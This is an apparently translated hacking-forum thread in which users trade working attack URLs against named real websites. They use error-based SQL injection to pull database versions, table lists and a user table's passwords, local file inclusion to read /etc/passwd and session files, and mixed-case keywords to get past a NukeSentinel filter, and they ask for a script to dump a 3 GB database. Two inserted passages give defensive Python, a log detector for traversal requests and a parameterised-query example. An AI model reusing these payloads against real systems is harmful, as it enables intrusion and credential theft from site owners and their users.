Code: http://www.venen-kur.info/index.php?id=1319&lang=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+ What's the problem?
Code:
System information:
-----------------------------------------
base:db242799363
basedir:/usr/local/mysql-5.0.81-linux-i686-glibc23/
os:pc-linux-gnu
ver:5.0.81-log
datadir:/db/mysql/
tmpdir:/var/tmp
-----------------------------------------
Tables in information_schema.tables - 29
-----------------------------------------
COLLATIONS COLUMNS COLUMN_PRIVILEGES ROUTINES SCHEMA_PRIVILEGES TABLES TABLE_PRIVILEGES USER_PRIVILEGES
cms_languages cms_pages cms_settings user_functions user_groups user_platforms
CHARACTER_SETS COLLATION_CHARACTER_SET_APPLICABILITY KEY_COLUMN_USAGE PROFILING SCHEMATA STATISTICS TABLE_CONSTRAINTS TRIGGERS VIEWS
cms_media cms_related cms_trees user_group_functions user_in_group user_users
-----------------------------------------
Table [ user_users ]
-----------------------------------------
Database for user_users: example.com
Number of columns in example.com.user_users: 9
Columns in example.com.user_users
username platform_id is_superuser first_login session_key id email password session
----------
I don't see any problems
Well, actually yes)) PS: Code: http://www.venen-kur.info/index.php?id=1319&lang=(select+1+from+(select+count(0),concat((select+password+from+user_users+limit+0,1),floor(rand(0)*2))+from+user_users+group+by+2)a)--+
No, you did concat_ws%28 username,0x3a,password%29 but only :jmvN/m90uBX8OHg is visible, and is that the login or the password?? And why only that?
Please help: here is a PHP injection: Code: http://www.partnersinpreservation.com/boston/index.php?sec=../../../../../../../../../../../../../etc/passwd%00&locID=16 I found the PHPSESSID there, it is j7h4hqb6d43c1f0e3bc84volf6. I enter Code: http://www.partnersinpreservation.com/boston/index.php?sec=../../../../../../../../../../../../../tmp/sess_j7h4hqb6d43c1f0e3bc84volf6 and there is nothing. What other directory could the session file be in?
Better study this instead: Code: http://www.partnersinpreservation.com/boston/index.php?sec=/proc/self/status%00 http://www.partnersinpreservation.com/boston/index.php?sec=/etc/httpd/conf/httpd.conf%00 http://www.partnersinpreservation.com/boston/index.php?sec=/proc/version%00 https://forum.antichat.net/showpost.php?p=1088072&postcount=11
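From the defender's side, the requests in the two posts above share a recognisable shape: a file-selecting parameter carrying `../` sequences, absolute system paths, or a trailing `%00`. The following is an added example, not part of the thread; the host, sample URLs, prefix list and function name are constructed assumptions. It flags that pattern in logged request URLs.

```python
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumed list of OS directories an include parameter should never point into.
SYSTEM_PREFIXES = ("/etc/", "/proc/", "/tmp/", "/var/")

def flag_request(url: str) -> dict:
    """Map each suspicious query parameter to the sorted reasons it was flagged."""
    findings = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = unquote(value)  # second decode pass catches double-encoded input
        reasons = set()
        if "\x00" in value:
            reasons.add("nul-byte")      # %00 used to cut off an appended suffix
        path = value.replace("\\", "/").split("\x00", 1)[0]
        if ".." in path.split("/"):
            reasons.add("traversal")     # ../ climbing out of the include directory
        if path.startswith(SYSTEM_PREFIXES):
            reasons.add("system-path")   # absolute path into OS directories
        if reasons:
            findings[name] = sorted(reasons)
    return findings

# Constructed sample requests (placeholder host; parameter names follow the thread).
SAMPLE_URLS = [
    "http://example.test/index.php?sec=../../../../etc/passwd%00&locID=16",
    "http://example.test/index.php?sec=/proc/self/status%00",
    "http://example.test/index.php?sec=%252e%252e/%252e%252e/tmp/sess_x&locID=16",
    "http://example.test/index.php?sec=about&locID=16",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(flag_request(url) or "clean", url)
```

Detection like this only reports the requests; the fix on the application side is to map the parameter to a fixed allow-list of section names instead of building a file path from it.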
A standard SQL injection http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220%27 but union and select are cut by the NukeSentinel module http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220+and+substring%28version%28%29,1,1%29=5 select is also cut in subqueries. How do I get around it?
For example, like this: Code: http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=-220+unIoN+SeLeCt+1,2+--+
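The reply above depends on mixed-case keywords getting past a keyword blacklist, which is why such filters are not a fix for the underlying injection. The following is an added example, not part of the thread and not NukeSentinel's code; the filter is a constructed stand-in assumed to be case-sensitive, and the table, row and function names are hypothetical. It sets that filter beside allow-list validation with a bound parameter.

```python
import re
import sqlite3

# Decoded parameter value from the reply above.
MIXED = "-220 unIoN SeLeCt 1,2 -- "

def naive_filter_allows(value: str) -> bool:
    """Hypothetical case-sensitive blacklist: True when nothing is blocked."""
    return re.search(r"union|select", value) is None

def normalized_filter_allows(value: str) -> bool:
    """Same blacklist made case-insensitive: stricter, but still a blacklist."""
    return re.search(r"union|select", value, re.IGNORECASE) is None

def parse_category_id(value: str) -> int:
    """Allow-list validation: the parameter must be a plain decimal integer."""
    if not re.fullmatch(r"[0-9]{1,9}", value):
        raise ValueError("id_catg must be a positive integer")
    return int(value)

def fetch_category(conn, raw_id: str):
    """Validate, then bind the value so it never becomes part of the SQL text."""
    cat_id = parse_category_id(raw_id)
    query = "SELECT id, title FROM categories WHERE id = ?"
    return conn.execute(query, (cat_id,)).fetchall()

def demo_db():
    """In-memory database with one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO categories VALUES (220, 'constructed sample row')")
    return conn

if __name__ == "__main__":
    print("case-sensitive blacklist allows it:", naive_filter_allows(MIXED))
    print("case-insensitive blacklist allows it:", normalized_filter_allows(MIXED))
    conn = demo_db()
    print("valid id:", fetch_category(conn, "220"))
    try:
        fetch_category(conn, MIXED)
    except ValueError as exc:
        print("rejected before reaching the database:", exc)
```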
Who can give me a good, powerful script to dump a 3 GB database? It throws errors at sizes like that!!
jecka3000, that is exactly the one that throws errors!!! Both 1.0.8b and 2.0.6 can't cope with such volumes!!
Hmm... Code: http://amkar.properm.ru/info.php?id=-999.9+or%281,1%29=%28select+count%280%29,concat%28%28select+concat%28database%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29 Version: 5.0.51a-24+lenny2-log Current User: properm@localhost
I looked at phpinfo(): magic_quotes_gpc is ON in the local value and OFF in the master value.. so is it ON or OFF now??